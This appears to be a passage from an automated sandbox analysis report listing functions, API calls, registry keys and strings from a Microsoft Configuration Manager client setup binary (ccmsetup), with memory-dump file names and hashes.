                                                                                          • ..\path.cpp, xrefs: 006080A7
                                                                                          • ..\path.cpp, xrefs: 006080EE
                                                                                          • ..\path.cpp, xrefs: 00608032
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: Current$Thread$DescriptorErrorLastSecurity$ConvertDirectoryFreeH_prolog3_catchH_prolog3_catch_LocalPathRelativeString
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\path.cpp$..\path.cpp$..\path.cpp$..\path.cpp$..\path.cpp$..\path.cpp$CCM::Utility::Filesystem::Path::CreateEx$ConvertStringSecurityDescriptorToSecurityDescriptorW(szPermissions, 1, &psd, 0 )$Path::Create(szPath, &sa)$Path::Create(szPath, 0)
                                                                                          • API String ID: 13163585-76545198
                                                                                          • Opcode ID: 01cbe9e2554783a1da45f1744c130005ed21834c5c6da148ee4e433d8b0c2ee3
                                                                                          • Instruction ID: 9d45bc225fb8bf87e9969ab4fea906b8b1a6597c9d074d4bf6af3f4b6a73c79d
                                                                                          • Opcode Fuzzy Hash: 01cbe9e2554783a1da45f1744c130005ed21834c5c6da148ee4e433d8b0c2ee3
                                                                                          • Instruction Fuzzy Hash: C631B6B1980305AEDB20EBA08C09FEF7E76AF51B51F148015FD41672D2C7B9494A87A1
                                                                                          Function 00580025 Relevance: 26.6, APIs: 2, Strings: 13, Instructions: 335threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005801D4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$($2$AADCLIENTAPPID$AADRESOURCEURI$CCM::LocationServices::CcmGetAADInfoFromCMG(sCMGMP, sClientAppId, sAADResourceUri, sAADAuthUrl)$CCM::LocationServices::CcmGetCMGMetaData( sSiteCode.c_str(), sCMGMP, arrCMGMPs, sTRK)$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$smsmplist
                                                                                          • API String ID: 2882836952-3928954566
                                                                                          • Opcode ID: 03b7c3b852c6c347cddaedc9244ab3dc4090864ad5ddd641b6f500b9f26b6c5c
                                                                                          • Instruction ID: 7566518a51abbf15635a0378a422673dc16fb12146fafa054052557d98d37a18
                                                                                          • Opcode Fuzzy Hash: 03b7c3b852c6c347cddaedc9244ab3dc4090864ad5ddd641b6f500b9f26b6c5c
                                                                                          • Instruction Fuzzy Hash: 43E1697180025CEEEB21EBA4CD89BEEBBB9AF51304F1080D9A54577182DB741F88DF61
                                                                                          Function 005F12BE Relevance: 26.4, APIs: 6, Strings: 9, Instructions: 172threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005F12C5
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F1324
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F140B
                                                                                          • TlsGetValue.KERNEL32 ref: 005F1458
                                                                                          • TlsSetValue.KERNEL32(00000001,?,ConnectedStandby,00000000,?), ref: 005F14B8
                                                                                          • TlsSetValue.KERNEL32(00000000), ref: 005F1510
                                                                                          Strings
                                                                                          • ..\Logging.cpp, xrefs: 005F1413
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005F1406
                                                                                          • pszMessage != 0, xrefs: 005F131A
                                                                                          • g_LogHandlerInfo.pLogProc( sComponentName, sComponentContext, eLogType, pszSourceFile, uSourceLine, uThreadID, pszMessage ), xrefs: 005F1401
                                                                                          • ..\Logging.cpp, xrefs: 005F132C
                                                                                          • ..\Logging.cpp, xrefs: 005F1314
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005F131F
                                                                                          • ..\Logging.cpp, xrefs: 005F13FB
                                                                                          • ConnectedStandby, xrefs: 005F1497, 005F14A0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: Value$CurrentThread$H_prolog3H_prolog3_catch_
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\Logging.cpp$..\Logging.cpp$..\Logging.cpp$..\Logging.cpp$ConnectedStandby$g_LogHandlerInfo.pLogProc( sComponentName, sComponentContext, eLogType, pszSourceFile, uSourceLine, uThreadID, pszMessage )$pszMessage != 0
                                                                                          • API String ID: 900394322-829089931
                                                                                          • Opcode ID: f928c09bbdfede23a1b7c3bf095c31c407cdd87fe6bef19c6eb63631489321b7
                                                                                          • Instruction ID: 692ef03e7314fed628c7a63076c208c1466b45233a5854ceaae2d4133c25f76c
                                                                                          • Opcode Fuzzy Hash: f928c09bbdfede23a1b7c3bf095c31c407cdd87fe6bef19c6eb63631489321b7
                                                                                          • Instruction Fuzzy Hash: 8961CD7180424CEEDF11CFA8CC49AEEBFB9BB45300F144069F952AB2A1D7B85A45DF61
                                                                                          Function 005F2175 Relevance: 26.4, APIs: 6, Strings: 9, Instructions: 111threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005F217F
                                                                                          • TlsGetValue.KERNEL32 ref: 005F21EC
                                                                                          • TlsSetValue.KERNEL32(00000001), ref: 005F2214
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F227C
                                                                                          • TlsSetValue.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000200,?), ref: 005F2349
                                                                                          Strings
                                                                                          • Core::FormatString(pszMessage, szBuf, va), xrefs: 005F2272
                                                                                          • ..\Logging.cpp, xrefs: 005F2303
                                                                                          • InternalLog(eLogType, pszSourceFile, uSourceLine, uThreadID, szBuf.size() == 0 ? szLogBuf : szBuf), xrefs: 005F22ED
                                                                                          • ..\Logging.cpp, xrefs: 005F226C
                                                                                          • ..\Logging.cpp, xrefs: 005F2288
                                                                                          • ..\Logging.cpp, xrefs: 005F22E7
                                                                                          • `)l, xrefs: 005F223F, 005F2245
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005F2277
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005F22F2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: Value$CurrentH_prolog3_catch_Thread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\Logging.cpp$..\Logging.cpp$..\Logging.cpp$..\Logging.cpp$Core::FormatString(pszMessage, szBuf, va)$InternalLog(eLogType, pszSourceFile, uSourceLine, uThreadID, szBuf.size() == 0 ? szLogBuf : szBuf)$`)l
                                                                                          • API String ID: 1415402150-3147551473
                                                                                          • Opcode ID: 9c9ef7c005c50462bfd82326a8ecec491f56d2dccfba408271675fa92ef6e52b
                                                                                          • Instruction ID: 833d3c1cd056bd7f404d1bc1a0f319bfae600a924991ceda1cbf43a3db347dd6
                                                                                          • Opcode Fuzzy Hash: 9c9ef7c005c50462bfd82326a8ecec491f56d2dccfba408271675fa92ef6e52b
                                                                                          • Instruction Fuzzy Hash: 6B416FF094126CAADB21DF548D85BEE7EB9BF44700F4080E5FA08A2292D2745F85DF55
                                                                                          Function 005B619E Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 005B61A5
                                                                                            • Part of subcall function 005F663A: __EH_prolog3.LIBCMT ref: 005F6641
                                                                                            • Part of subcall function 005F663A: RegCloseKey.ADVAPI32(00000006,00000004,005FAE53,0000001C,005F9BFF,?), ref: 005F6661
                                                                                            • Part of subcall function 005F7229: __EH_prolog3_catch.LIBCMT ref: 005F7230
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B6230
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B6295
                                                                                          Strings
                                                                                          • Software\Microsoft\SMS\Mobile Client, xrefs: 005B61F3
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005B622B
                                                                                          • util.cpp, xrefs: 005B6238
                                                                                          • Failed to read assigned site code from registry. Error code = 0x%x, xrefs: 005B62F2
                                                                                          • GetAssignedSiteCode, xrefs: 005B61C1
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005B6290
                                                                                          • regKey.Open((( HKEY ) (ULONG_PTR)((LONG)0x80000002) ), szMobileClientKey, ulAccess), xrefs: 005B6226
                                                                                          • regKey.GetString(szAssignedSiteCode, sSiteCode), xrefs: 005B628B
                                                                                          • util.cpp, xrefs: 005B629D
                                                                                          • AssignedSiteCode, xrefs: 005B625D
                                                                                          • util.cpp, xrefs: 005B6285
                                                                                          • util.cpp, xrefs: 005B6220
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentH_prolog3_catchThread$CloseH_prolog3
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$AssignedSiteCode$Failed to read assigned site code from registry. Error code = 0x%x$GetAssignedSiteCode$Software\Microsoft\SMS\Mobile Client$regKey.GetString(szAssignedSiteCode, sSiteCode)$regKey.Open((( HKEY ) (ULONG_PTR)((LONG)0x80000002) ), szMobileClientKey, ulAccess)$util.cpp$util.cpp$util.cpp$util.cpp
                                                                                          • API String ID: 1757837785-3529154473
                                                                                          • Opcode ID: 118311f2b7155583e13f1b4f96c6d30b73b725634259f3fad8ef14c3e1a7a27b
                                                                                          • Instruction ID: 040fc7ae8119784c4c3f6b041747d88d2864d85deb6c9a31b728257a4218a237
                                                                                          • Opcode Fuzzy Hash: 118311f2b7155583e13f1b4f96c6d30b73b725634259f3fad8ef14c3e1a7a27b
                                                                                          • Instruction Fuzzy Hash: 7231BF71D8125AAAEB10EBA0C91EBEEBE61AF91714F144006F5407B3C2CBB85A05C7A1
                                                                                          Function 005B5115 Relevance: 24.6, APIs: 2, Strings: 12, Instructions: 150threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005B511C
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B51C2
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 00592624: GetCurrentThreadId.KERNEL32 ref: 00592630
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3H_prolog3_catch_
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$DetectPlatform$Failed to detect platform (0x%08x).$GetProcessorArchitecture(sArch)$IA64 architecture is not supported.$Running on platform %s$X64$X86$ia64$util.cpp$util.cpp$x86
                                                                                          • API String ID: 3353525418-2939577768
                                                                                          • Opcode ID: 58894f6e96feb074405a9beaccf7c879311555f8c93b96b286f75d2da2b71132
                                                                                          • Instruction ID: d751319495577781cd7e43c2712ae0aaccf026d108cb88a45f21d2e513c4f416
                                                                                          • Opcode Fuzzy Hash: 58894f6e96feb074405a9beaccf7c879311555f8c93b96b286f75d2da2b71132
                                                                                          • Instruction Fuzzy Hash: 6751BE71D06349EADF15EBE8C98ABDDBEB5BB54710F10405AF140B72C1DBB45A08CB61
                                                                                          Function 005B7119 Relevance: 24.6, APIs: 3, Strings: 11, Instructions: 90threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 005B7120
                                                                                            • Part of subcall function 005F663A: __EH_prolog3.LIBCMT ref: 005F6641
                                                                                            • Part of subcall function 005F663A: RegCloseKey.ADVAPI32(00000006,00000004,005FAE53,0000001C,005F9BFF,?), ref: 005F6661
                                                                                            • Part of subcall function 005F7229: __EH_prolog3_catch.LIBCMT ref: 005F7230
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B71AB
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B7210
                                                                                          Strings
                                                                                          • regKey.GetString(szMPList, sSMSMPList), xrefs: 005B7206
                                                                                          • regKey.Open((( HKEY ) (ULONG_PTR)((LONG)0x80000002) ), c_szRegKey_CcmRoot, ulAccess), xrefs: 005B71A1
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005B71A6
                                                                                          • util.cpp, xrefs: 005B71B3
                                                                                          • SOFTWARE\Microsoft\CCM, xrefs: 005B716E
                                                                                          • util.cpp, xrefs: 005B7200
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005B720B
                                                                                          • LookupMPList, xrefs: 005B71D8
                                                                                          • util.cpp, xrefs: 005B719B
                                                                                          • util.cpp, xrefs: 005B7218
                                                                                          • GetLookupMPListFromRegistry, xrefs: 005B713C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentH_prolog3_catchThread$CloseH_prolog3
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$GetLookupMPListFromRegistry$LookupMPList$SOFTWARE\Microsoft\CCM$regKey.GetString(szMPList, sSMSMPList)$regKey.Open((( HKEY ) (ULONG_PTR)((LONG)0x80000002) ), c_szRegKey_CcmRoot, ulAccess)$util.cpp$util.cpp$util.cpp$util.cpp
                                                                                          • API String ID: 1757837785-3058489484
                                                                                          • Opcode ID: aa5c1da28b3c34055d870c77be7ef4a92d41121a2fb6461b3944f9befb714f43
                                                                                          • Instruction ID: 79b2cc310ab3c52e35c314f33a0a24664a251c6f31a3bd74c5d626226ed759a9
                                                                                          • Opcode Fuzzy Hash: aa5c1da28b3c34055d870c77be7ef4a92d41121a2fb6461b3944f9befb714f43
                                                                                          • Instruction Fuzzy Hash: C131B231D89349AADB10EBE4CC0AFEE7E627F95B10F184145B640BB3C2CB645A05C7A1
                                                                                          Function 005B75A1 Relevance: 24.6, APIs: 3, Strings: 11, Instructions: 90threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 005B75A8
                                                                                            • Part of subcall function 005F663A: __EH_prolog3.LIBCMT ref: 005F6641
                                                                                            • Part of subcall function 005F663A: RegCloseKey.ADVAPI32(00000006,00000004,005FAE53,0000001C,005F9BFF,?), ref: 005F6661
                                                                                            • Part of subcall function 005F7229: __EH_prolog3_catch.LIBCMT ref: 005F7230
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B7633
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B7698
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentH_prolog3_catchThread$CloseH_prolog3
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$GetSLPFromRegistry$SMSSLP$SOFTWARE\Microsoft\CCM$regKey.GetString(szSMSSLP, sSLP)$regKey.Open((( HKEY ) (ULONG_PTR)((LONG)0x80000002) ), c_szRegKey_CcmRoot, ulAccess)$util.cpp$util.cpp$util.cpp$util.cpp
                                                                                          • API String ID: 1757837785-24882935
                                                                                          • Opcode ID: d57ef0ac190079717544a62625d3255cd5d17e5ec4ae53bca19e4eeee3de9d2a
                                                                                          • Instruction ID: 600fe965845d585987f3f136af11db35b6c05cad33536990be0e5caad5f100c8
                                                                                          • Opcode Fuzzy Hash: d57ef0ac190079717544a62625d3255cd5d17e5ec4ae53bca19e4eeee3de9d2a
                                                                                          • Instruction Fuzzy Hash: E131EF31D8425EAADB10EFA4C81AFEE7F62AF95B14F184046F500BB3C2CB745A05D7A1
                                                                                          Function 00605EB4 Relevance: 22.8, APIs: 4, Strings: 9, Instructions: 99threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 00605EBB
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00605F0E
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00605F77
                                                                                          • GetLongPathNameW.KERNEL32(00000000,00000000,00000000,?,00000000,CCM::Utility::Filesystem::File::Exists,0000006C,005F9CC5,?,CcmProfiler.dll,?,?), ref: 00605FBB
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catch_LongNamePath
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\CcmFile.cpp$..\CcmFile.cpp$..\CcmFile.cpp$..\CcmFile.cpp$CCM::Utility::Filesystem::File::Exists$filePath.assign(szPath)$szPath != 0
                                                                                          • API String ID: 2353050750-3916083559
                                                                                          • Opcode ID: 93c4f1951c52114fa6b223186271f6bf1b27848dc506dbe8c5c515d5818892db
                                                                                          • Instruction ID: 29a4d2beb96ec5b7454d54c81c3a1526d98cacaa5ef358e6969b0731b1ba9153
                                                                                          • Opcode Fuzzy Hash: 93c4f1951c52114fa6b223186271f6bf1b27848dc506dbe8c5c515d5818892db
                                                                                          • Instruction Fuzzy Hash: 60310671985389EADB24DBB4CC0ABEF7F65AF21710F148058F5467B2C2CB685904CF62
                                                                                          Function 00605D68 Relevance: 22.8, APIs: 4, Strings: 9, Instructions: 98threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 00605D6F
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00605DC2
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00605E2B
                                                                                          • GetLongPathNameW.KERNEL32(00000000,00000000,?,?,?,CCM::Utility::Filesystem::Directory::Exists,0000006C,0057E854,?,?,?,ccmsetup.exe,?,?,Temp\,00000040), ref: 00605E6F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catch_LongNamePath
